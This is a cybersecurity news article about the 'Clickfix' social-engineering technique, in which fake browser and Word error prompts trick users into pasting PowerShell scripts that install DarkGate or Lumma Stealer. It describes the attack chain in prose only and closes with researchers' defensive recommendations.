A novel and sophisticated malware delivery method, Clickfix, has recently been uncovered. Threat actors have used it to distribute malware such as DarkGate and Lumma Stealer in countries such as the United States, the United Kingdom, Mexico, Canada, Brazil, Argentina, Peru, Egypt, France, Spain, Portugal, Germany, Italy, India, China, Laos, Australia, Vietnam, and Japan, among others.
This represents a significant evolution in social engineering tactics. It begins when users are enticed to visit seemingly legitimate but compromised websites. Once there, visitors are redirected to domains hosting fake pop-up windows instructing them to paste a script into a PowerShell terminal, a manoeuvre designed to execute malicious activities on their systems.
Researchers identified a phishing email containing an HTML attachment designed to look like a Word document. This HTML file displays an error prompt that tricks users into clicking a ‘How to fix’ button.
Upon further examination, the underlying code revealed several base64-encoded content blocks. Notably, a significant <Title> tag block decodes to a PowerShell command that downloads an HTA (HTML Application) file from a remote server and saves it locally.
“The attackers’ additional instruction to press Windows+R (which opens the Run dialogue) and then press CTRL+V (which pastes the contents from the clipboard) suggests a social engineering tactic to convince the user further to execute the PowerShell script. This sequence of actions is intended to initiate the downloaded script (likely stored in the clipboard) without the user fully understanding its potentially malicious nature,” noted researchers. “Once the user does this, the HTA file gets downloaded.”
The downloaded HTA file is executed via the start-process command, initiating harmful actions. The script also clears the clipboard content and terminates the PowerShell session to evade detection. DarkGate then communicates with its command and control (C2) server to continue its malicious operations.
Similarly, Lumma Stealer uses the Clickfix technique to compromise systems. Researchers discovered a website that displayed an error message urging users to follow steps to fix the issue. These steps involve copying a malicious script to the clipboard and executing it in PowerShell.
“McAfee Labs discovered a website displaying an error message indicating that the browser is encountering issues displaying the webpage. The site provides steps to fix the problem, designed to deceive users into executing malicious actions,” researchers added.
Upon execution, the script flushes the DNS cache, fetches and executes a script from a remote URL, and clears the screen to hide its activity. The script then downloads and unzips malware, which begins communicating with this C2 server, stealing sensitive information from the infected system.
Researchers have urged users to install antivirus software, implement email and web filtering, deploy network security mechanisms, enforce the principle of least privilege, monitor the clipboard, deploy multi-factor authentication, and ensure all operating systems are up-to-date.
Threat actors have recently been using multiple avenues to distribute DarkGate. Only yesterday, we reported that cybercrooks are using Excel files to spread DarkGate via SMB shares.
In April 2024, it was reported that DarkGate spread to more than thirty countries via novel HTML phishing. Furthermore, in January 2024, it was discovered that Microsoft Teams was used as a gateway for a phishing attack to deliver DarkGate.
Similarly, in January 2024, researchers discovered that YouTube channels were being exploited to distribute Lumma Stealer.
In the News: Mspy data breach exposes millions of customers’ information
